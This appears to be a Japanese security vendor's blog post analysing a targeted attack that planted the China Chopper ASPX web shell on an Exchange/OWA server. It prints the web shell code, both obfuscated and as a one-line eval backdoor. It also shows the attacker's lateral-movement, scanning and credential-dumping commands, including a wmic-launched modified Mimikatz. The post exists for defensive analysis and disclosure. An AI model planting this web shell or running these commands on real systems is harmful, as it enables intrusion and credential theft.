エクスプロイト&脆弱性
Webシェル「Chopper」を利用した最近の標的型攻撃事例を解説
本ブログ記事では、トレンドマイクロが最近調査したASPX Webシェル「Chopper」を利用した標的型攻撃の手法について解説します。この事例ではWebシェルの設置に、Microsoft Exchange Server の脆弱性が利用されたものと推測しています。
本ブログ記事では、トレンドマイクロが最近調査したASPX Webシェル「Chopper」(本記事紹介の事例に関連する検体は「Backdoor.ASP.WEBSHELL.UWMANA」として検出)を利用した標的型攻撃の手法について解説します。この事例ではWebシェルの設置に、Microsoft Exchange Server の脆弱性が利用されたものと推測しています。
■Webシェルとは?
「Webシェル(Web Shell)」とは、Web経由でのコマンド実行を可能にするバックドアの一種です。Webシェルはシンプルで使いやすく、システムを侵害する目的で利用された際に非常に強力な力を発揮します。Webシェルのコードは、ASP、PHP、JSP、あるいはWebを通過するパラメータを持ったシステムコマンドを実行できる、どのような任意のスクリプトでも記述することが可能です。わずか15バイト程度でも感染システムのリモート操作を可能にするWebシェルは、サーバ上に設置されたことに気づけないことも多々あります。特にセキュリティレイヤーが統合されていない場合はなおさらです。
Webシェルは既に一般的な攻撃手段となっており、その使用だけで攻撃者の特徴とできるものではありません。これは逆に、標的型攻撃において、特定の攻撃者によらず広く使用される可能性があることを意味します。Microsoft Detection Response Team(DART)は2021年2月、Webシェルを使用する攻撃が倍増していることを報告しています。法人組織のセキュリティ担当者はWebシェルがどのように攻撃に使用されるかを認識する必要があるものと言えるでしょう。
■調査事例に対する技術的分析
侵入
今回の事例では、攻撃の背後にいるサイバー犯罪者は、外部と接続したOutlook Web App (OWA) サーバ内にWebシェル「Chopper」であるASPXファイルをドロップしていました。これにより攻撃者は、永続性を確立させ攻撃基盤を確立し、そのサーバを介してリモートコマンドを送信することを可能にしました。
Outlook Web App (Web Directory) - D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\15.1.2044\scripts\premium\premium.aspx |
可能性としてはMicrosoft Exchange Serverの脆弱性を悪用し、遠隔でWebシェルをドロップしたものと推測されます。本事例の調査時点で公表されていたMicrosoft Exchange Serverの脆弱性として、リモートコード実行が可能になる「CVE-2020-0688」がありました。Microsoftは2020年2月、この脆弱性に対処するための修正プログラムを公開しています。また、同社は2021年3月2日、Microsoft Exchange Serverに関する複数の脆弱性(CVE-2021-26855, CVE-2021-26857, CVE-2021-27065, CVE-2021-26858)と、それらを利用したゼロデイ攻撃が既に発生していたことを報告しています。ただし、本記事の事例においていずれの脆弱性が使用されたか、現時点では断定できていません。
以下は、Chopperの攻撃の特徴となるスクリプトです。
<%@ Page Language="Jscript" Debug=true%> |
<% |
var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJjb21tYW5kIl0=")); |
var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl")); |
var c=eval(a,b); |
eval(c,b); |
%> |
不正なスクリプトは簡単にすると以下のようになります。「eval」が実行者で、「Request.Form」 が実行されるパラメータを取得します。
<%@ Page Language="Jscript"%><%eval(Request.Form["Command"],"unsafe");%> |
いくつかの攻撃例で、攻撃者が検出を回避するために以下の短いスクリプトを挿入していることが確認されています。
ユーザの特定
Chopperがシステム感染に成功すると、攻撃者は、プライマリユーザ、または現在システムにログオンしているユーザを特定するために、コマンド「query user(quser)」を実行します。トレンドマイクロの調査では、このコマンド「quser」は、アクティブなリモートセッションを特定するために攻撃全体を通して繰り返し使用されていました。
難読化解除技術
Chopperはツールを展開するため、感染システムにドロップしたパッケージファイルを、コマンド「expand」を利用して解凍します。
expand {filename}.ex_ {filename}.dat |
expand {filename}.ex_ {filename}.exe |
Chopperによる他の攻撃と比較して、当該攻撃には顕著な相違点が見られました。それは、ユーザプロファイルのntuser.datなどのデータ保存目的で一般的に使用されている「.dat」拡張子の使用です。この攻撃においては.datファイルが実行ファイルとして使用されていました。
横展開(内部活動)
その後、Webシェル「Chopper」を他のホストのアクセス可能な共有フォルダにコピーし、アクセス権を得ようとします。
copy premium.aspx "\\{hostname}\d$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\15.1.2044\scripts\premium |
また、インストールされたハッキングツール 「Hacktool.Win32.CATLIKE.A」 と、正規の cURL であるC:\tempcurl.dat を使用して、脆弱性を見つけるためにネットワーク全体をスキャンします。
特に、Apache Tomcat、Citrix、phpMyAdminアプリケーションに存在するWebサーバ関連の脆弱性とパスワードの弱点についてスキャンします。
| アプリケーションまたはポート | コマンド |
| Oracle WebLogic | curl.dat -v -H 'Content-Type: text/xml;charset=UTF-8' http://{ipアドレス\]:7001/wls-wsat/CoordinatorPortType |
| Oracle Console | curl.dat -vv http://{ipアドレス}:7001/console/j_security_check -d j_username={ユーザ名}&j_password={パスワード}&submit=Login" |
| PHPMyAdmin | curl.dat -vv --connect-timeout 2 {ipアドレス}/phpmyadmin |
| Apache Tomcat | s.dat -u http://{ipアドレス}:8080/manager/html |
ポート
|
s.dat -i 10.217.229.189 -p {ポート} |
表 1:特定のアプリケーションとポートに存在する
Webサーバ関連の脆弱性とパスワードをスキャンするために使用されるコマンド
この攻撃では、WMI コマンドライン (wmic) ユーティリティを利用して他の感染エンドポイントにリモートでプロセスが実行されることも確認しました。
セッション ID を介した任意のコマンドの実行
脆弱性攻撃成功後に設置されたChopperは、システムの特権にアクセスすることが可能です。そして、エンドポイントの一つに「Trojan.Win32.PRIVESC.A」をドロップして実行します。このトロイの木馬型マルウェアは、「SeTcbPrivilege」の特権を持つユーザの下で実行される必要があります。これにより、攻撃者はすべてのWindowsセッションを見ることができ、セッションIDを介してセッション上で任意のコマンドを実行することができます。
情報探索
情報探索には、nltest、ping、whoami、netstat、net、nslookup、hostname、tasklistなど、他の攻撃においてもよく利用される代表的なWindowsコマンドラインツールを使用しています。また、一般に公開されており、攻撃者およびドメイン管理者の間で非常に人気のある「LG.exe」と呼ばれるJoeWareドメインツールがインストールされており、攻撃に使用されていました。
認証情報へのアクセス
ユーザの認証情報を取得するために、攻撃者はオープンソースのアプリケーションMimikatzの修正版である「HackTool.MSIL.Mimikatz.AF」を、パラメータ「x, xxx, xxxx, xxxx, xxxasd」で利用して使用していました。
wmic /node:{ip address} process call create "cmd.exe /c c:\users\mpBD6D42.dat xxxasd -pass > c:\users\23.txt |
収集
攻撃者は「wevtutil.exe」を使用して、標的のユーザ名からセキュリティ関連イベントを照会し、q.txtファイルとしてエクスポートします。窃取した認証情報やその他のログをパッケージングするためにはrar.exeなどのサードパーティ製アプリケーションは利用せず、代わりにコマンド「makecab」を使用します。
· makecab a.txt > 111 |
· makecab aaa2.txt >1 |
攻撃者は、インストールされているセキュリティコンポーネントやアプリケーションをファイル名として使用して、目につかないように隠蔽します。
· C:\Program Files\Trend Micro\ ams p.dat |
· C:\Oracle\Oracle.dat |
· C:\Program Files\McAfee\MacAfee.dat |
これらWebシェル「Chopper」の不審な活動は、トレンドマイクロのXDR ソリューションによって確認することができました。XDRソリューションによって、観察可能な攻撃手法を監視し、異常なファイル拡張子の実行、システムツールを介したリモート実行、Webシェル関連の活動、および潜在的な脆弱性悪用攻撃などの重要なセキュリティ警告が提供されます。
■被害に遭わないためには
Webシェルは、脆弱性などのセキュリティの隙を突くことによってシステムに埋め込まれる可能性があります。攻撃者は、システムで使用されている脆弱性を持つアプリケーションを特定して悪用し、リモートコードの実行やデータの抽出を目的に、Webシェルをインストールします。
法人組織を狙うWebシェル攻撃から確実に防御するための、いくつかのセキュリティ推奨事項をご紹介します。
- システムおよびアプリケーションにパッチを当てる:Microsoft Exchange Server、Apache Tomcat、Oracle Web Logic Server、PHPMyAdmin などの公開アプリケーションの脆弱性には、対処する修正プログラムが適用されていることを確認する
- 破られにくいパスワードを導入する:複数のアプリケーションやWebサイトで同じパスワードを使用しない。可能な限り多要素認証など追加のセキュリティを使用する
- IIS の web.config ファイルに静的鍵があるかどうかをチェックする:CVE-2020-0688 で確認されたように、ランダムに生成された鍵ではなく静的鍵を使用すると、攻撃者がサーバを欺き、 ViewState データをデシリアライズし、任意のコードを実行することが可能になることに注意する
法人組織は、高度な攻撃や脅威から重要なデータを保護するため、信頼性の高いアラートに基づいた包括的かつ効率的な保護、検出、予防、および修復をリアルタイムで行う必要があります。すべてのセキュリティセンサーを統合して表示することにより、一カ所で確認することができるため、迅速かつ徹底した調査と対応を実施することができます。
■トレンドマイクロの対策
「Trend Micro XDR™」は、メール、エンドポイント、サーバ、クラウドワークロード、ネットワークなど、トレンドマイクロのソリューションによって各組織から収集されたデータセットに、最も効果的な専門的分析を適用し、攻撃を特定して阻止するための迅速な対応を実現します。強力な人工知能(AI)と専門家によるセキュリティ分析により、お客様の環境から得られるデータとトレンドマイクロのグローバルな脅威インテリジェンスを相関させ、より少ない頻度で、より忠実度の高いアラートを配信し、さらなる早期発見を実現します。優先度の高い最適化されたアラートを1つのコンソールで提供し、ガイド付き調査でサポートすることで、攻撃の経路および組織へ及ぼす影響を完全に把握するために必要なステップを簡素化します。
■侵入の痕跡(Indicators of Compromise 、IoCs)
侵入の痕跡(Indicators of Compromise、IoCs)は、こちらを参照してください。
参考記事:
• 「Chopper ASPX Web Shell Used in Targeted Attack」
By: Trend Micro
翻訳:室賀 美和(Core Technology Marketing, Trend Micro™ Research)